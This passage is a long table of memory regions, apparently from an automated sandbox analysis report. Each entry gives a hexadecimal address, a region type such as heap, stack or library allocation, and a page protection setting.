|
page readonly
|
||
7FFC23C50000
|
unkown
|
page readonly
|
||
22289340000
|
trusted library allocation
|
page read and write
|
||
216AF674000
|
trusted library allocation
|
page read and write
|
||
2055F9F0000
|
direct allocation
|
page read and write
|
||
24AAE20A000
|
heap
|
page read and write
|
||
20BEEC37000
|
heap
|
page read and write
|
||
7FFBAB9C2000
|
trusted library allocation
|
page read and write
|
||
24AAE069000
|
heap
|
page read and write
|
||
22658224000
|
heap
|
page read and write
|
||
21CA0F90000
|
trusted library allocation
|
page read and write
|
||
D92F77F000
|
stack
|
page read and write
|
||
2DF6D250000
|
heap
|
page read and write
|
||
24AAE180000
|
remote allocation
|
page read and write
|
||
20561736000
|
heap
|
page read and write
|
||
300B47E000
|
stack
|
page read and write
|
||
77E480E000
|
stack
|
page read and write
|
||
24AAE9A8000
|
heap
|
page read and write
|
||
7FFBABA36000
|
trusted library allocation
|
page read and write
|
||
7FFC11FBE000
|
unkown
|
page read and write
|
||
7FFBABB62000
|
trusted library allocation
|
page read and write
|
||
22288B80000
|
heap
|
page read and write
|
||
7FF79BF78000
|
unkown
|
page readonly
|
||
216AF89E000
|
trusted library allocation
|
page read and write
|
||
2265824B000
|
heap
|
page read and write
|
||
24AAE965000
|
heap
|
page read and write
|
||
24AAE074000
|
heap
|
page read and write
|
||
7FFBABD10000
|
trusted library allocation
|
page read and write
|
||
2B1B7C29000
|
heap
|
page read and write
|
||
24AAE96A000
|
heap
|
page read and write
|
||
7FFC12EA1000
|
unkown
|
page execute read
|
||
D9307CE000
|
stack
|
page read and write
|
||
22288C13000
|
heap
|
page read and write
|
||
7FFC12F10000
|
unkown
|
page readonly
|
||
24AAE9BE000
|
heap
|
page read and write
|
||
216C68CC000
|
heap
|
page read and write
|
||
216C686A000
|
heap
|
page read and write
|
||
20561AD0000
|
direct allocation
|
page read and write
|
||
24AAE9C9000
|
heap
|
page read and write
|
||
20561D20000
|
heap
|
page read and write
|
||
7FFC0FF1F000
|
unkown
|
page read and write
|
||
216AF671000
|
trusted library allocation
|
page read and write
|
||
7FFC0FF20000
|
unkown
|
page write copy
|
||
7FFC1EC84000
|
unkown
|
page read and write
|
||
21CB9820000
|
trusted library allocation
|
page read and write
|
||
1D34BE64000
|
heap
|
page read and write
|
||
2B1B7C61000
|
heap
|
page read and write
|
||
7FFC12FE5000
|
unkown
|
page readonly
|
||
24AAE8E7000
|
heap
|
page read and write
|
||
7FFBABCB0000
|
trusted library allocation
|
page read and write
|
||
7FFC1E0B3000
|
unkown
|
page readonly
|
||
7FFC0F850000
|
unkown
|
page execute read
|
||
7FFC12E84000
|
unkown
|
page read and write
|
||
21CA2151000
|
trusted library allocation
|
page read and write
|
||
216C69E0000
|
trusted library allocation
|
page read and write
|
||
226581E0000
|
remote allocation
|
page read and write
|
||
BEF177C000
|
stack
|
page read and write
|
||
216AF721000
|
trusted library allocation
|
page read and write
|
||
7FFBABBF5000
|
trusted library allocation
|
page read and write
|
||
24AAE96A000
|
heap
|
page read and write
|
||
20561751000
|
heap
|
page read and write
|
||
216C67C0000
|
trusted library allocation
|
page read and write
|
||
24AAE9B5000
|
heap
|
page read and write
|
||
D5AFBFF000
|
stack
|
page read and write
|
||
1D34C602000
|
trusted library allocation
|
page read and write
|
||
21C9F5F0000
|
heap
|
page read and write
|
||
24AAE08C000
|
heap
|
page read and write
|
||
21CB98A4000
|
heap
|
page read and write
|
||
24AAE9F3000
|
heap
|
page read and write
|
||
24AAE277000
|
heap
|
page read and write
|
||
20561751000
|
heap
|
page read and write
|
||
7FFC12F33000
|
unkown
|
page readonly
|
||
28338270000
|
heap
|
page read and write
|
||
242AB779000
|
heap
|
page read and write
|
||
23F98550000
|
remote allocation
|
page read and write
|
||
24AAE06C000
|
heap
|
page read and write
|
||
77E38FE000
|
stack
|
page read and write
|
||
216AC854000
|
heap
|
page read and write
|
||
24AAE9EF000
|
heap
|
page read and write
|
||
216C6B80000
|
heap
|
page read and write
|
||
2055F9B5000
|
heap
|
page read and write
|
||
216C67A0000
|
heap
|
page execute and read and write
|
||
FA07FFE000
|
stack
|
page read and write
|
||
24AAE9C9000
|
heap
|
page read and write
|
||
24AAE1CF000
|
heap
|
page read and write
|
||
24AAE9EF000
|
heap
|
page read and write
|
||
21CB97C0000
|
trusted library allocation
|
page read and write
|
||
7FFBABBD0000
|
trusted library allocation
|
page read and write
|
||
21CA3033000
|
trusted library allocation
|
page read and write
|
||
D5AF6FE000
|
stack
|
page read and write
|
||
216AF67A000
|
trusted library allocation
|
page read and write
|
||
21C9F738000
|
heap
|
page read and write
|
||
21C9F79E000
|
heap
|
page read and write
|
||
77E36FF000
|
stack
|
page read and write
|
||
216C6826000
|
heap
|
page read and write
|
||
24AAE9C5000
|
heap
|
page read and write
|
||
7FFBABBD0000
|
trusted library allocation
|
page read and write
|
||
216AE160000
|
trusted library allocation
|
page read and write
|
||
2055F2D9000
|
heap
|
page read and write
|
||
7FFBABCA0000
|
trusted library allocation
|
page read and write
|
||
23F97E5F000
|
heap
|
page read and write
|
||
7FFC11FA6000
|
unkown
|
page readonly
|
||
300B57E000
|
stack
|
page read and write
|
||
24AAE9CB000
|
heap
|
page read and write
|
||
7FFBABCA0000
|
trusted library allocation
|
page read and write
|
||
24AAE8C8000
|
heap
|
page read and write
|
||
7FFC12EE3000
|
unkown
|
page readonly
|
||
20BEEAA0000
|
heap
|
page read and write
|
||
24AAE9EF000
|
heap
|
page read and write
|
||
28338E27000
|
heap
|
page read and write
|
||
7FF6A42B0000
|
unkown
|
page readonly
|
||
24AAE9DE000
|
heap
|
page read and write
|
||
7FFC12916000
|
unkown
|
page readonly
|
||
7FFC11FA5000
|
unkown
|
page read and write
|
||
9ACD29C000
|
stack
|
page read and write
|
||
24AAE074000
|
heap
|
page read and write
|
||
7FFBABA76000
|
trusted library allocation
|
page read and write
|
||
2B1B7C58000
|
heap
|
page read and write
|
||
2056170A000
|
heap
|
page read and write
|
||
216AF8E7000
|
trusted library allocation
|
page read and write
|
||
7FFBABC30000
|
trusted library allocation
|
page read and write
|
||
242AB63B000
|
heap
|
page read and write
|
||
24AAE9BB000
|
heap
|
page read and write
|
||
216AF7B9000
|
trusted library allocation
|
page read and write
|
||
24AAE9C6000
|
heap
|
page read and write
|
||
D93098F000
|
stack
|
page read and write
|
||
2B1B7C40000
|
heap
|
page read and write
|
||
216C68A2000
|
heap
|
page read and write
|
||
24AAE9CF000
|
heap
|
page read and write
|
||
23F97DC0000
|
heap
|
page read and write
|
||
24AAE07F000
|
heap
|
page read and write
|
||
24AAE9E4000
|
heap
|
page read and write
|
||
24AAE8CF000
|
heap
|
page read and write
|
||
2056170A000
|
heap
|
page read and write
|
||
EEFAA7E000
|
stack
|
page read and write
|
||
2055F2D2000
|
heap
|
page read and write
|
||
242AB5CB000
|
heap
|
page read and write
|
||
20561757000
|
heap
|
page read and write
|
||
2DF6D4F0000
|
heap
|
page read and write
|
||
21CA20E0000
|
trusted library allocation
|
page read and write
|
||
24AAE80C000
|
heap
|
page read and write
|
||
28F30F13000
|
heap
|
page read and write
|
||
242AB764000
|
heap
|
page read and write
|
||
7FFBABC90000
|
trusted library allocation
|
page read and write
|
||
8EB9BFA000
|
stack
|
page read and write
|
||
28F305D0000
|
trusted library allocation
|
page read and write
|
||
216AF709000
|
trusted library allocation
|
page read and write
|
||
216AC84A000
|
heap
|
page read and write
|
||
242AB600000
|
heap
|
page read and write
|
||
20BEEC2F000
|
heap
|
page read and write
|
||
24AAE953000
|
heap
|
page read and write
|
||
7FFBABB70000
|
trusted library allocation
|
page execute and read and write
|
||
20561C40000
|
direct allocation
|
page read and write
|
||
24AAE7BF000
|
heap
|
page read and write
|
||
216AC772000
|
heap
|
page read and write
|
||
24AAE9CD000
|
heap
|
page read and write
|
||
24AAE892000
|
heap
|
page read and write
|
||
24AAE9C6000
|
heap
|
page read and write
|
||
24AAE9B5000
|
heap
|
page read and write
|
||
22288C3D000
|
heap
|
page read and write
|
||
21CB9598000
|
heap
|
page read and write
|
||
300B27F000
|
stack
|
page read and write
|
||
7FFBABC40000
|
trusted library allocation
|
page read and write
|
||
216C68BC000
|
heap
|
page read and write
|
||
24AAE856000
|
heap
|
page read and write
|
||
24AAE9CF000
|
heap
|
page read and write
|
||
7FFC120A3000
|
unkown
|
page read and write
|
||
216C685F000
|
heap
|
page read and write
|
||
24AAE9A3000
|
heap
|
page read and write
|
||
216AF71E000
|
trusted library allocation
|
page read and write
|
||
216AF715000
|
trusted library allocation
|
page read and write
|
||
D92FBF7000
|
stack
|
page read and write
|
||
21CB97F0000
|
trusted library allocation
|
page read and write
|
||
216C6844000
|
heap
|
page read and write
|
||
24AAE9C5000
|
heap
|
page read and write
|
||
24AAE9DE000
|
heap
|
page read and write
|
||
216AF718000
|
trusted library allocation
|
page read and write
|
||
24AAE9F3000
|
heap
|
page read and write
|
||
D93090E000
|
stack
|
page read and write
|
||
23F97DF0000
|
trusted library allocation
|
page read and write
|
||
24AAE09A000
|
heap
|
page read and write
|
||
7FFC12F51000
|
unkown
|
page execute read
|
||
7FFBABC80000
|
trusted library allocation
|
page read and write
|
||
7FFC11FA1000
|
unkown
|
page execute read
|
||
7FFC11E6B000
|
unkown
|
page readonly
|
||
216AF8D5000
|
trusted library allocation
|
page read and write
|
||
205617D2000
|
heap
|
page read and write
|
||
7FFC0F85D000
|
unkown
|
page execute read
|
||
2055F8B0000
|
direct allocation
|
page read and write
|
||
7FFC0FF45000
|
unkown
|
page read and write
|
||
216C689D000
|
heap
|
page read and write
|
||
D5AF7FE000
|
stack
|
page read and write
|
||
7FFBABD50000
|
trusted library allocation
|
page read and write
|
||
7FF79BBC0000
|
unkown
|
page readonly
|
||
216AF703000
|
trusted library allocation
|
page read and write
|
||
24AAE8C8000
|
heap
|
page read and write
|
||
24AAE9F3000
|
heap
|
page read and write
|
||
7FFBAB9DC000
|
trusted library allocation
|
page read and write
|
||
216C689F000
|
heap
|
page read and write
|
||
7FFC12E81000
|
unkown
|
page execute read
|
||
7FFBABCC0000
|
trusted library allocation
|
page read and write
|
||
28338D22000
|
heap
|
page read and write
|
||
216AF5E8000
|
trusted library allocation
|
page read and write
|
||
7FFC12911000
|
unkown
|
page execute read
|
||
21CA222D000
|
trusted library allocation
|
page read and write
|
||
205617D4000
|
heap
|
page read and write
|
||
7FFBABB90000
|
trusted library allocation
|
page execute and read and write
|
||
7FFC1ED90000
|
unkown
|
page readonly
|
||
24AAE9BB000
|
heap
|
page read and write
|
||
D92FB78000
|
stack
|
page read and write
|
||
24AAE9EF000
|
heap
|
page read and write
|
||
21CB9851000
|
heap
|
page read and write
|
||
2055F870000
|
direct allocation
|
page read and write
|
||
2B1B7C64000
|
heap
|
page read and write
|
||
216AF852000
|
trusted library allocation
|
page read and write
|
||
77E494F000
|
stack
|
page read and write
|
||
7FFBAB983000
|
trusted library allocation
|
page execute and read and write
|
||
7FF6A42E6000
|
unkown
|
page read and write
|
||
28338D6F000
|
heap
|
page read and write
|
||
24AAE9E0000
|
heap
|
page read and write
|
||
8EBA2FF000
|
stack
|
page read and write
|
||
7FFC12913000
|
unkown
|
page readonly
|
||
226581E0000
|
remote allocation
|
page read and write
|
||
28338463000
|
heap
|
page read and write
|
||
9ACD8FE000
|
stack
|
page read and write
|
||
7FFC12E85000
|
unkown
|
page readonly
|
||
216C67C0000
|
trusted library allocation
|
page read and write
|
||
24AAE23D000
|
heap
|
page read and write
|
||
28338E23000
|
heap
|
page read and write
|
||
24AAE95B000
|
heap
|
page read and write
|
||
24AAE012000
|
heap
|
page read and write
|
||
D92F97D000
|
stack
|
page read and write
|
||
7FFC11FC0000
|
unkown
|
page readonly
|
||
242AB672000
|
heap
|
page read and write
|
||
7FFC12E31000
|
unkown
|
page execute read
|
||
242AD20D000
|
heap
|
page read and write
|
||
7FFC0F7A1000
|
unkown
|
page readonly
|
||
242AB8A5000
|
heap
|
page read and write
|
||
21CA2194000
|
trusted library allocation
|
page read and write
|
||
8EBA07E000
|
stack
|
page read and write
|
||
24AAE946000
|
heap
|
page read and write
|
||
205617B6000
|
heap
|
page read and write
|
||
7FFC12910000
|
unkown
|
page readonly
|
||
216B03D6000
|
trusted library allocation
|
page read and write
|
||
7FFC12EF1000
|
unkown
|
page execute read
|
||
7FFBABB22000
|
trusted library allocation
|
page read and write
|
||
216AC760000
|
heap
|
page read and write
|
||
24AAE782000
|
heap
|
page read and write
|
||
24AAE09A000
|
heap
|
page read and write
|
||
21CB9810000
|
trusted library allocation
|
page read and write
|
||
24AAE7C4000
|
heap
|
page read and write
|
||
216AE120000
|
trusted library allocation
|
page read and write
|
||
21CB9800000
|
trusted library allocation
|
page read and write
|
||
7FFC0FE15000
|
unkown
|
page readonly
|
||
216AE150000
|
heap
|
page readonly
|
||
216C6B98000
|
heap
|
page read and write
|
||
205617C3000
|
heap
|
page read and write
|
||
24AAE030000
|
heap
|
page read and write
|
||
7FFC0FAD5000
|
unkown
|
page write copy
|
||
24AAE799000
|
heap
|
page read and write
|
||
8FDEEFE000
|
stack
|
page read and write
|
||
20562090000
|
direct allocation
|
page read and write
|
||
24AAE08B000
|
heap
|
page read and write
|
||
7FFC11E74000
|
unkown
|
page readonly
|
||
20561760000
|
heap
|
page read and write
|
||
21CA3241000
|
trusted library allocation
|
page read and write
|
||
22658318000
|
heap
|
page read and write
|
||
242AB760000
|
heap
|
page read and write
|
||
216B01C0000
|
trusted library allocation
|
page read and write
|
||
7FFC12EC0000
|
unkown
|
page readonly
|
||
24AAE274000
|
heap
|
page read and write
|
||
7FFC1ED75000
|
unkown
|
page readonly
|
||
24AAE854000
|
heap
|
page read and write
|
||
21CB987E000
|
heap
|
page read and write
|
||
FA081FE000
|
stack
|
page read and write
|
||
216AF7A4000
|
trusted library allocation
|
page read and write
|
||
7FFBABC70000
|
trusted library allocation
|
page read and write
|
||
7FFC23C51000
|
unkown
|
page execute read
|
||
7FFC1E0B5000
|
unkown
|
page readonly
|
||
2DF6D306000
|
heap
|
page read and write
|
||
216AF2B6000
|
trusted library allocation
|
page read and write
|
||
24AAE77F000
|
heap
|
page read and write
|
||
28338C02000
|
heap
|
page read and write
|
||
24AAE880000
|
heap
|
page read and write
|
||
1D34BE00000
|
heap
|
page read and write
|
||
24AAE8CB000
|
heap
|
page read and write
|
||
22658259000
|
heap
|
page read and write
|
||
7FFBABB31000
|
trusted library allocation
|
page read and write
|
||
24AAE08C000
|
heap
|
page read and write
|
||
2055F9C2000
|
heap
|
page read and write
|
||
216AE140000
|
trusted library allocation
|
page read and write
|
||
7FFC1206B000
|
unkown
|
page read and write
|
||
7FFC12FF0000
|
unkown
|
page readonly
|
||
2055F9C0000
|
heap
|
page read and write
|
||
D5AF1FE000
|
stack
|
page read and write
|
||
7FFC0FEE5000
|
unkown
|
page read and write
|
||
2055F340000
|
heap
|
page read and write
|
||
2B1B7C5F000
|
heap
|
page read and write
|
||
21C9F734000
|
heap
|
page read and write
|
||
24AAE9BB000
|
heap
|
page read and write
|
||
205616F5000
|
heap
|
page read and write
|
||
7FFC12F69000
|
unkown
|
page readonly
|
||
242AD160000
|
heap
|
page read and write
|
||
7FFC120B1000
|
unkown
|
page execute read
|
||
7FFC12F04000
|
unkown
|
page read and write
|
||
2B1B7C6C000
|
heap
|
page read and write
|
||
2055F0D0000
|
heap
|
page read and write
|
||
F20287B000
|
stack
|
page read and write
|
||
7FFBABA3C000
|
trusted library allocation
|
page execute and read and write
|
||
24AAE748000
|
heap
|
page read and write
|
||
7FFBABD10000
|
trusted library allocation
|
page read and write
|
||
216AF8DB000
|
trusted library allocation
|
page read and write
|
||
24AAE8F5000
|
heap
|
page read and write
|
||
23F97E00000
|
heap
|
page read and write
|
||
7FFC0FF22000
|
unkown
|
page read and write
|
||
7FFC12FE1000
|
unkown
|
page execute read
|
||
7FFC12F05000
|
unkown
|
page readonly
|
||
24AAE08E000
|
heap
|
page read and write
|
||
24AAE8C6000
|
heap
|
page read and write
|
||
BCF012C000
|
stack
|
page read and write
|
||
7FFBAB9C3000
|
trusted library allocation
|
page execute and read and write
|
||
7FFBABC00000
|
trusted library allocation
|
page read and write
|
||
216C6815000
|
heap
|
page read and write
|
||
24AAE9C3000
|
heap
|
page read and write
|
||
2265825B000
|
heap
|
page read and write
|
||
D92F87D000
|
stack
|
page read and write
|
||
24AAE9BB000
|
heap
|
page read and write
|
||
21CB1625000
|
trusted library allocation
|
page read and write
|
||
7FFC1ED71000
|
unkown
|
page execute read
|
||
216C67C0000
|
trusted library allocation
|
page read and write
|
||
24AAE7F8000
|
heap
|
page read and write
|
||
28F30713000
|
heap
|
page read and write
|
||
77E488D000
|
stack
|
page read and write
|
||
24AAE06F000
|
heap
|
page read and write
|
||
216C6B90000
|
heap
|
page read and write
|
||
216AF89A000
|
trusted library allocation
|
page read and write
|
||
24AAE9CF000
|
heap
|
page read and write
|
||
24AAE07F000
|
heap
|
page read and write
|
||
7FF79BF78000
|
unkown
|
page readonly
|
||
21CA1035000
|
heap
|
page read and write
|
||
20561716000
|
heap
|
page read and write
|
||
7FFC12E30000
|
unkown
|
page readonly
|
||
24AAE093000
|
heap
|
page read and write
|
||
24AAE1C6000
|
heap
|
page read and write
|
||
FA080FE000
|
stack
|
page read and write
|
||
24AAE9F3000
|
heap
|
page read and write
|
||
216AF79B000
|
trusted library allocation
|
page read and write
|
||
24AAE8C8000
|
heap
|
page read and write
|
||
216AF5EE000
|
trusted library allocation
|
page read and write
|
||
21CA2225000
|
trusted library allocation
|
page read and write
|
||
242AB8A0000
|
heap
|
page read and write
|
||
216B019A000
|
trusted library allocation
|
page read and write
|
||
77E4A4C000
|
stack
|
page read and write
|
||
7FFC12F21000
|
unkown
|
page execute read
|
||
20561654000
|
heap
|
page read and write
|
||
216C67C0000
|
trusted library allocation
|
page read and write
|
||
EEFACFE000
|
stack
|
page read and write
|
||
7FFC11F8F000
|
unkown
|
page read and write
|
||
216C67C4000
|
trusted library allocation
|
page read and write
|
||
205616C6000
|
heap
|
page read and write
|
||
24AAE8CB000
|
heap
|
page read and write
|
||
21CA1030000
|
heap
|
page read and write
|
||
216C6BEA000
|
heap
|
page read and write
|
||
24AAE748000
|
heap
|
page read and write
|
||
28338513000
|
heap
|
page read and write
|
||
24AAE9E0000
|
heap
|
page read and write
|
||
242AB650000
|
heap
|
page read and write
|
||
205616F5000
|
heap
|
page read and write
|
||
BEF19FF000
|
stack
|
page read and write
|
||
216AF8DE000
|
trusted library allocation
|
page read and write
|
||
D92FD7B000
|
stack
|
page read and write
|
||
28338489000
|
heap
|
page read and write
|
||
24AAE1E6000
|
heap
|
page read and write
|
||
205617D2000
|
heap
|
page read and write
|
||
216AC80E000
|
heap
|
page read and write
|
||
216C69E0000
|
trusted library allocation
|
page read and write
|
||
24AAE074000
|
heap
|
page read and write
|
||
216AF892000
|
trusted library allocation
|
page read and write
|
||
7FFBABA70000
|
trusted library allocation
|
page read and write
|
||
24AAE7FC000
|
heap
|
page read and write
|
||
216BE792000
|
trusted library allocation
|
page read and write
|
||
216ACAC5000
|
heap
|
page read and write
|
||
7FFC1208D000
|
unkown
|
page readonly
|
||
D5AFEFB000
|
stack
|
page read and write
|
||
7FF6A42B1000
|
unkown
|
page execute read
|
||
216AC6A0000
|
heap
|
page read and write
|
||
1D34BE13000
|
heap
|
page read and write
|
||
242AB77E000
|
heap
|
page read and write
|
||
21CA1460000
|
heap
|
page execute and read and write
|
||
2833843C000
|
heap
|
page read and write
|
||
216AF680000
|
trusted library allocation
|
page read and write
|
||
7FFC0F839000
|
unkown
|
page execute read
|
||
24AAE9F3000
|
heap
|
page read and write
|
||
2055F260000
|
heap
|
page read and write
|
||
24AAE9CB000
|
heap
|
page read and write
|
||
24AAE768000
|
heap
|
page read and write
|
||
216C688E000
|
heap
|
page read and write
|
||
2055F9B5000
|
heap
|
page read and write
|
||
216C6890000
|
heap
|
page read and write
|
||
216B0262000
|
trusted library allocation
|
page read and write
|
||
21C9F774000
|
heap
|
page read and write
|
||
216AE5C0000
|
heap
|
page read and write
|
||
2B1B7C76000
|
heap
|
page read and write
|
||
7FFC12E6E000
|
unkown
|
page readonly
|
||
21C9F6C0000
|
heap
|
page readonly
|
||
216AF330000
|
trusted library allocation
|
page read and write
|
||
242AB5C6000
|
heap
|
page read and write
|
||
20561860000
|
direct allocation
|
page read and write
|
||
7FFC13004000
|
unkown
|
page readonly
|
||
20561653000
|
heap
|
page read and write
|
||
2055F3E0000
|
direct allocation
|
page read and write
|
||
7FFBABC10000
|
trusted library allocation
|
page read and write
|
||
7FFC11F91000
|
unkown
|
page readonly
|
||
216AF668000
|
trusted library allocation
|
page read and write
|
||
24AAE831000
|
heap
|
page read and write
|
||
24AAE9E3000
|
heap
|
page read and write
|
||
22288D02000
|
heap
|
page read and write
|
||
7FF6A42DF000
|
unkown
|
page read and write
|
||
24AAE075000
|
heap
|
page read and write
|
||
24AAE9EF000
|
heap
|
page read and write
|
||
7FFBABC57000
|
trusted library allocation
|
page read and write
|
||
7FFBABBE0000
|
trusted library allocation
|
page read and write
|
||
7FFC12E91000
|
unkown
|
page execute read
|
||
2055F3A0000
|
direct allocation
|
page read and write
|
||
77E3A3F000
|
stack
|
page read and write
|
||
7FFC1ED94000
|
unkown
|
page read and write
|
||
2B1B7BC0000
|
heap
|
page read and write
|
||
7FFBABBC0000
|
trusted library allocation
|
page read and write
|
||
2056170A000
|
heap
|
page read and write
|
||
28338E00000
|
heap
|
page read and write
|
||
24AAE7B4000
|
heap
|
page read and write
|
||
24AAE9B5000
|
heap
|
page read and write
|
||
7FFBABD30000
|
trusted library allocation
|
page read and write
|
||
216C681D000
|
heap
|
page read and write
|
||
28338200000
|
heap
|
page read and write
|
||
1D34BD70000
|
heap
|
page read and write
|
||
22288C5A000
|
heap
|
page read and write
|
||
216C68C2000
|
heap
|
page read and write
|
||
28338486000
|
heap
|
page read and write
|
||
2055F2ED000
|
heap
|
page read and write
|
||
7FFBABA7C000
|
trusted library allocation
|
page execute and read and write
|
||
24AAE884000
|
heap
|
page read and write
|
||
24AAE8C8000
|
heap
|
page read and write
|
||
22658200000
|
heap
|
page read and write
|
||
216AF8C6000
|
trusted library allocation
|
page read and write
|
||
7FFBABCF0000
|
trusted library allocation
|
page read and write
|
||
21CA2182000
|
trusted library allocation
|
page read and write
|
||
242AB671000
|
heap
|
page read and write
|
||
24AAE069000
|
heap
|
page read and write
|
||
21CA2213000
|
trusted library allocation
|
page read and write
|
||
7FFBABC80000
|
trusted library allocation
|
page read and write
|
||
24AAE9F3000
|
heap
|
page read and write
|
||
24AAE8CB000
|
heap
|
page read and write
|
||
24AAE8EF000
|
heap
|
page read and write
|
||
D5AF2FE000
|
stack
|
page read and write
|
||
216AC7BB000
|
heap
|
page read and write
|
||
216AC79F000
|
heap
|
page read and write
|
||
BEF18FE000
|
stack
|
page read and write
|
||
7FFBABAA6000
|
trusted library allocation
|
page execute and read and write
|
||
283385B9000
|
heap
|
page read and write
|
||
EEFA9FD000
|
stack
|
page read and write
|
||
216C6889000
|
heap
|
page read and write
|
||
7FFC12F44000
|
unkown
|
page readonly
|
||
28338400000
|
heap
|
page read and write
|
||
24AAE083000
|
heap
|
page read and write
|
||
7FFBABCB0000
|
trusted library allocation
|
page read and write
|
||
24AAE9CD000
|
heap
|
page read and write
|
||
24AAE9DE000
|
heap
|
page read and write
|
||
7FF6A42E1000
|
unkown
|
page read and write
|
||
7FFC0FF09000
|
unkown
|
page read and write
|
||
24AAE8EF000
|
heap
|
page read and write
|
||
216AF79E000
|
trusted library allocation
|
page read and write
|
||
205617D2000
|
heap
|
page read and write
|
||
20BEEAF0000
|
heap
|
page read and write
|
||
28F30629000
|
heap
|
page read and write
|
||
226581E0000
|
remote allocation
|
page read and write
|
||
2833845B000
|
heap
|
page read and write
|
||
21CA302A000
|
trusted library allocation
|
page read and write
|
||
22658010000
|
heap
|
page read and write
|
||
24AAE0A8000
|
heap
|
page read and write
|
||
216C6865000
|
heap
|
page read and write
|
||
24AAE9CB000
|
heap
|
page read and write
|
||
7FFBAB984000
|
trusted library allocation
|
page read and write
|
||
24AAE8B1000
|
heap
|
page read and write
|
||
216C689F000
|
heap
|
page read and write
|
||
24AAE99B000
|
heap
|
page read and write
|
||
24AAE9D1000
|
heap
|
page read and write
|
||
216B03C1000
|
trusted library allocation
|
page read and write
|
||
F202BFE000
|
stack
|
page read and write
|
||
216AE939000
|
trusted library allocation
|
page read and write
|
||
2B1A44E000
|
stack
|
page read and write
|
||
24AAE075000
|
heap
|
page read and write
|
||
216AC846000
|
heap
|
page read and write
|
||
216B01DA000
|
trusted library allocation
|
page read and write
|
||
7FFC21E14000
|
unkown
|
page readonly
|
||
28338E30000
|
heap
|
page read and write
|
||
24AAE0A8000
|
heap
|
page read and write
|
||
24AAE9EF000
|
heap
|
page read and write
|
||
24AAE9CD000
|
heap
|
page read and write
|
||
8FDEFFF000
|
stack
|
page read and write
|
||
22288C75000
|
heap
|
page read and write
|
||
20561736000
|
heap
|
page read and write
|
||
2B1B7C4E000
|
heap
|
page read and write
|
||
2056164F000
|
heap
|
page read and write
|
||
7FFC0FE4B000
|
unkown
|
page readonly
|
||
216C67D7000
|
heap
|
page execute and read and write
|
||
24AAE8D5000
|
heap
|
page read and write
|
||
216AE530000
|
trusted library allocation
|
page read and write
|
||
2055F985000
|
heap
|
page read and write
|
||
24AAE9CD000
|
heap
|
page read and write
|
||
20BEEC02000
|
heap
|
page read and write
|
||
216AF82D000
|
trusted library allocation
|
page read and write
|
||
21CB9679000
|
heap
|
page read and write
|
||
24AAE1E6000
|
heap
|
page read and write
|
||
7FFC13003000
|
unkown
|
page read and write
|
||
216BE75A000
|
trusted library allocation
|
page read and write
|
||
7FF6A42EF000
|
unkown
|
page readonly
|
||
24AAE832000
|
heap
|
page read and write
|
||
21CB9B90000
|
heap
|
page read and write
|
||
216C68AF000
|
heap
|
page read and write
|
||
24AAE9C3000
|
heap
|
page read and write
|
||
22657FA0000
|
heap
|
page read and write
|
||
24AAE07F000
|
heap
|
page read and write
|
||
7FFC11E61000
|
unkown
|
page execute read
|
||
205617B6000
|
heap
|
page read and write
|
||
24AAE8EF000
|
heap
|
page read and write
|
||
205617C2000
|
heap
|
page read and write
|
||
21CA304D000
|
trusted library allocation
|
page read and write
|
||
24AAE96C000
|
heap
|
page read and write
|
||
7FFC0FA07000
|
unkown
|
page readonly
|
||
21C9F640000
|
heap
|
page read and write
|
||
24AAE8EF000
|
heap
|
page read and write
|
||
22658300000
|
heap
|
page read and write
|
||
7FFC12F20000
|
unkown
|
page readonly
|
||
21CB97F0000
|
trusted library allocation
|
page read and write
|
||
2055F9A3000
|
heap
|
page read and write
|
||
7FFBABB62000
|
trusted library allocation
|
page read and write
|
||
216AC710000
|
heap
|
page read and write
|
||
7FFC12E83000
|
unkown
|
page readonly
|
||
24AAE0A8000
|
heap
|
page read and write
|
||
216C6B40000
|
remote allocation
|
page read and write
|
||
20561779000
|
heap
|
page read and write
|
||
2055F2FB000
|
heap
|
page read and write
|
||
7FFC0FAFD000
|
unkown
|
page readonly
|
||
24AAE030000
|
heap
|
page read and write
|
||
7FFBABBB0000
|
trusted library allocation
|
page read and write
|
||
216C6858000
|
heap
|
page read and write
|
||
7FFC23C56000
|
unkown
|
page readonly
|
||
24AAE09A000
|
heap
|
page read and write
|
||
22288B70000
|
heap
|
page read and write
|
||
242AB560000
|
heap
|
page read and write
|
||
24AAE720000
|
heap
|
page read and write
|
||
21C9F777000
|
heap
|
page read and write
|
||
2265822A000
|
heap
|
page read and write
|
||
2055F2ED000
|
heap
|
page read and write
|
||
77E48CF000
|
stack
|
page read and write
|
||
226581A0000
|
trusted library allocation
|
page read and write
|
||
24AAE271000
|
heap
|
page read and write
|
||
216C683D000
|
heap
|
page read and write
|
||
7FFBABCD0000
|
trusted library allocation
|
page read and write
|
||
D92FBFE000
|
stack
|
page read and write
|
||
242AD1C0000
|
trusted library allocation
|
page read and write
|
||
216C67C0000
|
trusted library allocation
|
page read and write
|
||
21CA1689000
|
trusted library allocation
|
page read and write
|
||
7FF79BF4F000
|
unkown
|
page read and write
|
||
24AAE957000
|
heap
|
page read and write
|
||
24AAE8F2000
|
heap
|
page read and write
|
||
21CA1470000
|
heap
|
page read and write
|
||
28338E13000
|
heap
|
page read and write
|
||
22658313000
|
heap
|
page read and write
|
||
7FFC13028000
|
unkown
|
page read and write
|
||
7FFC12F03000
|
unkown
|
page readonly
|
||
24AAE83A000
|
heap
|
page read and write
|
||
24AAE074000
|
heap
|
page read and write
|
||
7FFC11E80000
|
unkown
|
page readonly
|
||
7FF6A42D0000
|
unkown
|
page readonly
|
||
7FFBABAE0000
|
trusted library allocation
|
page execute and read and write
|
||
24AAE9DE000
|
heap
|
page read and write
|
||
2DF6D293000
|
heap
|
page read and write
|
||
7FFC0FA05000
|
unkown
|
page execute read
|
||
7FFBABD00000
|
trusted library allocation
|
page read and write
|
||
24AAE063000
|
heap
|
page read and write
|
||
2B1B7B60000
|
heap
|
page read and write
|
||
77E33F5000
|
stack
|
page read and write
|
||
7FFC0FE41000
|
unkown
|
page readonly
|
||
7FFBABCF0000
|
trusted library allocation
|
page read and write
|
||
20BEEC13000
|
heap
|
page read and write
|
||
216AF72A000
|
trusted library allocation
|
page read and write
|
||
21CB97F0000
|
trusted library allocation
|
page read and write
|
||
242AD0A4000
|
trusted library allocation
|
page read and write
|
||
20BEED02000
|
heap
|
page read and write
|
||
24AAE072000
|
heap
|
page read and write
|
||
7FFBABCE0000
|
trusted library allocation
|
page read and write
|
||
216AC79B000
|
heap
|
page read and write
|
||
24AAE08A000
|
heap
|
page read and write
|
||
28F30702000
|
heap
|
page read and write
|
||
24AAE9C3000
|
heap
|
